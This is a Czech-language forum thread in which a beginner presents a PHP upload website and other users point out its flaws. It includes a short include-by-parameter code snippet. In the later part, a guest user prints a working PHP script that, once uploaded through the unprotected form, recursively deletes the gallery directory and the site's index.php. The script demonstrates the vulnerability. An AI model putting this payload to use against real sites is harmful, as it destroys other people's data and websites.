php Upload stranka

[CZskypr 0]

Novy upload web pro

všechny je už předelaní na chrismas

mužete nahravat stahovat hodí se dokonale pro

obrazky , hudbu, atd.

 

http://www.najdes.4fan.cz/

 

 

pište komenty..

[DooM 93]

neni to spatne 7/10

[CZskypr 0]

dik.. ale hodil bi se server protoze nema tak velku kapacitu..

[Guest]

0/10

 

Proč?

 

Když se nahraje soubor, který tam již je, tak se přepíše

Absolutně nulová ochrana před scripty

[CZskypr 0]

Maš pravdu blba ochrana tak mi porad ak to mam ochranit ja to neumim

a je prava neni to tak codersky na 100 pro ale na to ze sem novaček v codech..

[Nikes 9]

ňák ti to neběží

[CZskypr 0]

Prosim toho kdo mi to furt maže tak aby my to nemazal dik..

[MajkX 16]

xD Kto mu zhodil ten web /??

[CZskypr 0]

prosim neschazujteto ja se to ućim neničte mi ideali a pomožte mi z ochranom prosim..

[Guest]

Být tebou bych začal dělat jednodušší věci

[CZskypr 0]

jj maš pravdu ale kozliku prosim nemaš nejaku ochranu proti takovim buzikum kteri mi tam mažu celi index.php ?? prosim

[Guest]

jj maš pravdu ale kazliku prosim nemaš nejaku ochranu proti takovim buzikum kteri mi tam mažu celi index.php ?? prosim

Jestli ti mažou index.php, tak máš asi někde v code chybu, takže se ji pokus opravit a máš to.

[CZskypr 0]

a nemuze to bit timto

if(!isset($_GET["act"])) //hl strana

{

necooo

}

else

{

$act = $_GET["act"];

if($act == "gallery") //gallery

{

include("bbbbege/gallery.php");

}

if($act == "bannery") //bannery

{

include("bbbbege/bannery.php");

}

if($act == "kontakt") //kontakt

{

include("bbbbege/kontakt.php");

}

}

?>

[Marley007 1]

Pokuds vim, endora má v podmíkách zákaz upload serverů...

[Guest]

Nemáš ochranu proti spuštění nahráného scriptu.

Takže když na web nahraju php soubor s tímto obsahem, tak jej můžu bez problému spustit

 

<?php
// funkce destroy(); není moje
 
 
define('PATH', '../gallery/');
 
function destroy($dir) {
    $mydir = opendir($dir);
    while(false !== ($file = readdir($mydir))) {
        if($file != "." && $file != "..") {
            chmod($dir.$file, 0777);
            if(is_dir($dir.$file)) {
                chdir('.');
                destroy($dir.$file.'/');
                rmdir($dir.$file) or DIE("couldn't delete $dir$file
");
            }
            else
                unlink($dir.$file) or DIE("couldn't delete $dir$file
");
        }
    }
    closedir($mydir);
}
destroy(PATH);
echo 'all done.'; 
unlink('../index.php');
rmdir('../gallery');
echo "hh";
?>

[CZskypr 0]

maš pravdu stejnak to furt nekdo niči takže na to prdim

kdo chcete dam nebo prodam ten web i z kodama

napište kdo chcete..

 

DIK ZA UPOZORNENI OHLEDNE ENDORI

[Guest]

Hele dělej jednodušší scripty, k souborům jsem se já ještě nedostal a to v PHP dělám už dlouho